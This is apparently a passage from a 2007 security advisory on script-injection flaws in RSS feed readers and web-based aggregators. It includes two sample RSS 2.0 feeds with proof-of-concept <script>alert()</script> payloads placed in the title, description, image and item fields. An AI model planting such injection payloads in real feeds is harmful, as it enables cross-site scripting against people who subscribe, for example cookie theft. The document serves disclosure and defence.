|
|
|
|
VULNERABILITY
Browsers, local readers, Web sites, and online portals, such as Bloglines, Google reader, and Rojo, all subscribe to feeds. More advanced methods of aggregating feeds are provided via AJAX coding techniques and XML components known as Web widgets. Ranging from full-fledged applications to small fragments of code that can be integrated into larger programs, they allow users to aggregate OPML files, email services, documents, or feeds into a single interface. Many customizable homepage/ portal implementations such as iGoogle, Live.com, My Yahoo!, and Pageflakes provide such functionality.
Even though data delivered by RSS feeds originates remotely, many clients display the data as if it were trusted local data. The RSS Specification states that story bodies (the
tag) allow HTML entities in order to allow HTML formatting, but it is not clear about the use of literal HTML tag inclusions. Research of several webfeed readers reveals different approaches to treating feed input and passing content to users. This is the area where the root cause of attack possibilities can be analyzed.
Problem 1: Problem With Feed Reader Client Applications
Many of the popular feed reading applications are faulted because the developers have failed to add security checks while interpreting the feed content, which may allow Javascript code to be executed on a client computer. The example given below shows script injection at multiple points.
<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.my-blog.com/styles/mystyle.css" type="text/css"?>
<rss version="2.0">
<channel>
<title> <script>alert('Title')</script></title>
<link>http://www.my-blog.com/</link>
<description> <script>alert('Description')</script> </description>
<language>en-us</language>
<copyright>SECURi</copyright>
<pubDate>Thu, 25 OCT 2007 09:20:43 IST</pubDate>
<ttl>10</ttl>
<image>
<title> <script>alert('ImageTitle')</script> </title>
<link>http://www.my-blog.com/</link>
<url>http://www.my-blog.com/mylogo.gif</url>
<width>180</width>
<height>50</height>
<description> <script>alert('ImageDescription')</script> </description>
<item>
<title> <script>alert('ItemTitle')</script> </title>
<link>http://www.my-blog.com/events.html</link>
<description> <script>alert('ItemDescription')</script> </description>
<pubDate>Thu, 25 OCT 2007 09:20:43 IST</pubDate>
</item>
</channel>
</rss>
This flaw may be used for a wide variety of malicious purposes, ranging from installing malicious software on a client system, to stealing cookies, etc. Attackers can exploit the vulnerability by setting up a malicious blog or web feeds, and enticing a user to subscribe to the RSS feed, or by adding malicious JavaScript in the comments section on a trusted blog. We will discuss more such risks in the "Impact" section later in this document.
The problem is centered around parsing XML entities. Aggregators treat < and > as literals in HTML code, [Literals: Any notation for representing a value within programming language source code] and thus execute any script contained in the feed, which in this case is JavaScript.
Problem 2: Problem With Web Based Feed Reading Services
Web application developers often implement the standard XML specification for their web based feed reader application. Web based reader converts HTML entities to their real values. While displaying this converted data to the user, there is a potential risk of a script injection: attackers could send malicious code to mailing lists that offer RSS or Atom feeds and trick users.
The following example shows an RSS 2.0 code.
<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.my-blog.com/styles/mystyle.css" type="text/css"?
>
<rss version="2.0">
<channel>
<title><script>alert('Title')</script> </title>
<link>http://www.my-blog.com/</link>
<description> <script>alert('Description')</script> </description>
<language>en-us</language>
<copyright>SECURi</copyright>
<pubDate>Thu, 25 OCT 2007 09:20:43 IST</pubDate>
<ttl>10</ttl>
<image>
<title><script>alert('ImageTitle')</script> </title>
<link>http://www.my-blog.com/</link>
<url>http://www.my-blog.com/mylogo.gif</url>
<width>180</width>
<height>50</height>
<description><script>alert('ImageDescription')</script> </description>
</image>
<item>
<title><script>alert('ItemTitle')</script> </title>
<link>http://www.my-blog.com/events.html</link>
<description> <script>alert('ItemDescription')</script> </description>
<pubDate>Thu, 25 OCT 2007 09:20:43 IST</pubDate>
</item>
</channel>
</rss>
There is a serious risk involved when reader applications [typically browser components] convert < to < and > to >, allowing script execution. |
|
|
|
|
|
|
|
